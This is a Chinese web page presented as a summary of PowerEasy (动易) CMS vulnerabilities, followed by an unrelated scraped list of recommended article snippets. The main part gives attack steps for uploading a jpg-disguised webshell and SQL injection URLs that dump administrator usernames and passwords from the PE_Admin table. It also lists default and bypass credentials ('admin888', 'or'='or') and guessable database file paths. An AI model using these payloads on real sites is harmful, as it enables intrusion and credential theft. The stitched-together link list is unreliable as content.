动易漏洞总结

方法1:

注册用户 keio.asAhttp://xtfhzx.com/reg/user_reg.asp

上传jpg马http://www.URL.com/user/Upload.asp?dialogtype=UserBlogPic&size=5

方法2:

先暴所有管理员帐号。/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1<>

暴管理员密码http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+username="admin"+and+'1'='1

用记事本打开网站这个目录下的文件:\config\SiteOption.config ,找到下面的代码处,修改红色标识的代码即可:

8888

2、对于SiteWeaver 版本,请用记事本打开网站根目录下的文件:config.asp,找到下面的代码处,修改红色标识的代码即可:

Const SiteManageCode = "PowerEasy2008"

常用账号和密码:

admin

admin888

'or'='or'

8888

2007

2008

2006

SiteManageCode8888/SiteManageCode

PowerEasy2006

PowerEasy2007

PowerEasy2008

数据库目录路径:

database/PowerEasy2006.mdb

database/PowerEasy2007.mdb

database/PowerEasy2008.mdb

database/SiteWeaver6.5.mdb

database/SiteWeaver.mdb

动易html在线编辑器 漏洞,动易网站漏洞总结相关推荐

  1. 动易html在线编辑器 漏洞,动易系统解决IE8网站后台编辑器无效问题

    微软的IE8正式版已于2009年3月20日正式发布了,也有不少的动易用户升级了自己的浏览器,但在升级后都发现动易的后台编辑器无法使用了,症状就是点击任何功能图标都没有弹出设置窗口,经过搜索了一下,终于 ...

  2. 动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞

    动易网站管理系统vote.asp页面存在SQL注入漏洞 测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等 ...

  3. 动易html在线编辑器 漏洞,动易上传漏洞1小时狂拿50个WEBSHELL

    动易上传漏洞1小时狂拿50个WEBSHELL 风云 QQ:325013287 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ...

  4. 动易html在线编辑器 漏洞,动易NewComment.asp注入漏洞

    在NewComment.asp文件中 ModuleName = Trim(request(\"ModuleName\")) 这个ModuleName变量没过滤好,从而导致,我们可以 ...

  5. 网站安全检测之用户密码找回网站漏洞的安全分析与利用

    我们SINE安全在对网站,以及APP端进行网站安全检测的时候发现很多公司网站以及业务平台,APP存在着一些逻辑上的网站漏洞,有些简简单单的短信验证码可能就会给整个网站带来很大的经济损失,很简单的网站功 ...

  6. 美信监控易助力大中型企业实现机房动环一体化监控

    美信监控易助力大中型企业实现机房动环一体化监控 在当前"数字中国.智慧中国"浪潮的推动下,全国各地智慧城市建设迈上新台阶.可以说,数字经济正在成为引领中国高质量发展的一个新引擎.因 ...

  7. 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...

    刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...

  8. H5类似易企秀/编辑器/页面制作/开发/生成工具/软件/源码/授权

    代码地址如下: http://www.demodashi.com/demo/14960.html 项目简介 H5DS (HTML5 Design software) 这是一款基于WEB的 H5制作工具 ...

  9. java在线支付---09,10,11,12_在线支付_分析易宝支付网关的应答协议与处理代码,完成用于处理支付响应的Servlet的初步编写和调试,完成处理支付网关响应结果的Servlet,支付实现

    09_在线支付_分析易宝支付网关的应答协议与处理代码 创梦综合技术qq交流群:CreDream:251572072 对支付结果返回的数据加密生成md5-hmac public static boole ...

  10. 乂学栗浩洋:教育版AlphaGo打破垄断,撬动2000亿在线教育市场

    栗浩洋:很高兴能够在新智元的平台和大家交流AI+教育这个话题.AI现在基本是被图像识别和NLP垄断,但在2014年我们开始做这一行的时候,不但人工智能没有火,很多人还对我们提出了很大的质疑:人工智能是 ...

最新文章

  1. MUI - 解决弹出输入法时页面高度变小导致底部上浮的问题
  2. 鸿蒙安卓翻版,鸿蒙是PPT、翻版安卓?对于黑粉:鸿蒙要失败了还有谁能成功?...
  3. android 镜像 制作工具,手机rom只制作-镜像工厂app下载2.8安卓最新版-西西软件下载...
  4. 一直认为 count(1) 比 count(*) 效果高,被同事鄙视了。
  5. 安装软件包的三种方法rpm包rpm工具yum工具
  6. 第 4 章  超链接和路径
  7. React中BrowserRouter与HashRouter的区别
  8. 《Netkiller Spring Cloud 手札》Spring boot 2.0 mongoTemplate 操作范例
  9. React脚手架学习笔记
  10. php 自定义加密算法,php自定义加密函数、解密
  11. ubuntu系统显卡、显卡驱动、CUDA、CUDNN的介绍以及版本匹配问题
  12. vue confirm确认
  13. 【等价转换】—— min/max 的转换与互相转换
  14. [转]ISO镜像工具PowerISO和UltraISO制作ISO光盘镜像教程
  15. python颜色空间之HSV简介
  16. 计算机无法启动安装程序,win7电脑无法安装程序或安装的程序不能运行怎么办...
  17. 让手机支持OTG,不看绝对后悔! - 我也做一回搬运工,解决RFID读卡器OTG支持问题
  18. 华为证书HCIE怎么样?考华为HCIE有用吗?
  19. 智商情商哪个重要_情商和智商 哪个对孩子更重要?
  20. html求三角形的面积,JavaScript计算三角形面积

热门文章

  1. linux fastboot 工具下载,FastBoot刷机工具
  2. 整合阿里云视频播放器——Coding在线(十四)
  3. corpus iweb_BYU-Corpus杨百翰大学英语语料系列数据库(BYU)
  4. 数学基础知识总结 —— 6. 基本矩阵运算公式
  5. Java学习代码合集
  6. Java项目大合集练手项目经验
  7. HTML5期末大作业:书店商城系统网站设计——响应式图书电商HTML 网上书店模板 (25页) HTML+CSS+JavaScript
  8. 小米路由器(R2D)开发版-固件分析
  9. 小米双频AC智能路由器699元震撼首发
  10. jsp MySQL购物车价格总和_计算购物车金额总和( jquery )